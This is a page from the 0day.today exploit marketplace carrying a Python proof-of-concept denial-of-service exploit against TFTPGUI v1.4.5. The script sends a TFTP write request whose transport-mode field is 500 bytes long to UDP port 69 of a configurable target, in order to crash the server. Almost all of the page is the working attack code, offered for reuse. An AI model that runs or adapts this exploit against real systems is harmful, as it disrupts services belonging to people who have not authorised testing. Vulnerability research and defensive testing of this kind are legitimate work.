[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TFTPGUI v1.4.5 Long Transport Mode Overflow

Author
Jeremiah Talamantes
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12110
Category
dos / poc
Date add
02-05-2010
Platform
windows
===========================================
TFTPGUI v1.4.5 Long Transport Mode Overflow
===========================================

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##             TFTPGUI Long Transport Mode Overflow            ##"
print "##                        Version 1.4.5                        ##"
print "##                      LIST Vulnerability                     ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# \n"
 
import socket
import sys
 
# Change these values to suit your needs
host = '192.168.1.108'
port = 69
  
try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "Error: unable to connect."
   sys.exit(1)
  
# Creating the overly long transport mode string
fn = "A"
md = "A" * 500
stuff = "\x00\x02" + fn + "\0" + md + "\0"
 
# Send data
s.sendto(stuff, (host, port))
print "Check to see if TFTPGUI is still running..."
 
# End



#  0day.today [2024-06-26]  #